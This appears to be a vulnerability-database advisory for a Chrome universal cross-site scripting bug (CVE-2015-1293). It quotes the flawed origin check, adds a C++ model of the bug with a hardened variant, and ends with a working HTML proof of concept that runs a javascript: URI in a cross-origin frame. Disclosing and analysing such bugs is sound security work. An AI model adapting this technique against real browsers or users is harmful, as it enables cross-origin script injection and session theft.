Chrome Universal XSS by loading a javascript: URI from an unloaded window (CVE-2015-1293)

2017-04-24T00:00:00
ID SSV:93033
Type seebug
Reporter Root
Modified 2017-04-24T00:00:00

Description

VULNERABILITY DETAILS

From /WebKit/Source/core/frame/DOMWindow.cpp:

```cpp
bool DOMWindow::isInsecureScriptAccess(LocalDOMWindow& callingWindow, const String& urlString)
{
    if (!protocolIsJavaScript(urlString))
        return false;

    // If this DOMWindow isn't currently active in the Frame, then there's no
    // way we should allow the access.
    if (isCurrentlyDisplayedInFrame()) {
        // FIXME: Is there some way to eliminate the need for a separate "callingWindow == this" check?
        if (&callingWindow == this)
            return false;

        // FIXME: The name canAccess seems to be a roundabout way to ask "can execute script".
        // Can we name the SecurityOrigin function better to make this more clear?
        if (callingWindow.frame()->securityContext()->securityOrigin()->canAccessCheckSuborigins(frame()->securityContext()->securityOrigin()))
            return false;
    }

    callingWindow.printErrorMessage(crossDomainAccessErrorMessage(&callingWindow));
    return true;
}
```

|callingWindow| may be an unloaded window whose associated |frame()| now holds another, potentially cross-origin document. The origin check then compares the origin of whatever document currently occupies the calling window's frame, not the origin of the calling window itself, so the security check can be bypassed.
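The following is an added, self-contained C++ model of the check described above; it is not Blink's code. It uses stand-in `Frame`, `DOMWindow` and `SecurityOrigin` types and a free function `isInsecureScriptAccessBuggy` that mirrors the page's logic (origin taken from the calling window's frame), beside `isInsecureScriptAccessFixed`, which reads the calling window's own document origin. The hardened variant is this example's assumption about where the origin should come from, not a reproduction of the upstream patch. `runScenario` builds the situation from the advisory: an iframe whose initial window is replaced by a cross-origin document while a reference to the old window survives.

```cpp
#include <iostream>
#include <string>

// Stand-in types constructed for this example (not Blink's real classes).
struct SecurityOrigin {
    std::string host;
    // Same-origin comparison; scheme and port omitted for brevity.
    bool canAccess(const SecurityOrigin& other) const { return host == other.host; }
};

struct Frame;

struct DOMWindow {
    SecurityOrigin origin;  // origin of the document this window belongs to
    Frame* frame;           // the frame this window was created in
    bool isCurrentlyDisplayedInFrame() const;
};

struct Frame {
    DOMWindow* currentWindow;  // window of the document currently shown in the frame
    const SecurityOrigin& securityOrigin() const { return currentWindow->origin; }
};

bool DOMWindow::isCurrentlyDisplayedInFrame() const {
    return frame && frame->currentWindow == this;
}

static bool protocolIsJavaScript(const std::string& url) {
    return url.rfind("javascript:", 0) == 0;
}

// Mirrors the page's check: the caller's origin is read from the *frame*,
// i.e. from whatever document occupies it at the time of the call.
// Returns true when the access must be blocked.
bool isInsecureScriptAccessBuggy(DOMWindow& target, DOMWindow& callingWindow,
                                 const std::string& url) {
    if (!protocolIsJavaScript(url)) return false;
    if (target.isCurrentlyDisplayedInFrame()) {
        if (&callingWindow == &target) return false;
        if (callingWindow.frame->securityOrigin().canAccess(target.frame->securityOrigin()))
            return false;
    }
    return true;
}

// Hardened variant (assumption of this example): the caller's origin comes from
// the calling window's own document, regardless of what its frame now shows.
bool isInsecureScriptAccessFixed(DOMWindow& target, DOMWindow& callingWindow,
                                 const std::string& url) {
    if (!protocolIsJavaScript(url)) return false;
    if (target.isCurrentlyDisplayedInFrame()) {
        if (&callingWindow == &target) return false;
        if (callingWindow.origin.canAccess(target.frame->securityOrigin()))
            return false;
    }
    return true;
}

struct Scenario {
    bool buggyBlocks;  // does the page's check block the navigation?
    bool fixedBlocks;  // does the hardened check block it?
};

// The advisory's situation: the iframe's initial window (same origin as the
// embedding page, here a constructed "attacker.example") is detached when the
// frame navigates to a cross-origin document, but it is still reachable.
Scenario runScenario() {
    Frame iframe{nullptr};
    DOMWindow initialWindow{SecurityOrigin{"attacker.example"}, &iframe};
    iframe.currentWindow = &initialWindow;
    DOMWindow navigatedWindow{SecurityOrigin{"abc.xyz"}, &iframe};
    iframe.currentWindow = &navigatedWindow;  // navigation replaces the window
    const std::string url = "javascript:alert(location)";
    Scenario s;
    s.buggyBlocks = isInsecureScriptAccessBuggy(navigatedWindow, initialWindow, url);
    s.fixedBlocks = isInsecureScriptAccessFixed(navigatedWindow, initialWindow, url);
    return s;
}

// Regression check: a genuinely same-origin parent must still be allowed.
bool legitimateSameOriginAllowed() {
    Frame top{nullptr}, child{nullptr};
    DOMWindow parent{SecurityOrigin{"site.example"}, &top};
    top.currentWindow = &parent;
    DOMWindow childWin{SecurityOrigin{"site.example"}, &child};
    child.currentWindow = &childWin;
    return !isInsecureScriptAccessFixed(childWin, parent, "javascript:void(0)");
}

int main() {
    Scenario s = runScenario();
    std::cout << "page's check blocks:    " << (s.buggyBlocks ? "yes" : "no") << "\n"
              << "hardened check blocks:  " << (s.fixedBlocks ? "yes" : "no") << "\n"
              << "same-origin still ok:   " << (legitimateSameOriginAllowed() ? "yes" : "no") << "\n";
    return 0;
}
```

The model shows the defect as a stale-identity problem: the check trusts a pointer to the frame's current document as a proxy for "who is calling", and that proxy changes under the caller's feet once the frame navigates. Any similar check should derive the caller's origin from an object that is bound to the caller for its whole lifetime.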

VERSION

Chrome 44.0.2403.157 (Stable)
Chrome 45.0.2454.46 (Beta)
Chrome 46.0.2486.0 (Dev)
Chromium 47.0.2493.0 (Release build compiled today)

REPRODUCTION CASE

```html
<script>
var i = document.documentElement.appendChild(document.createElement('iframe'));
var f = frames[0].Function;
i.onload = function() {
  f("location.replace('javascript:alert(location)')")();
}
i.src = 'https://abc.xyz';
</script>
```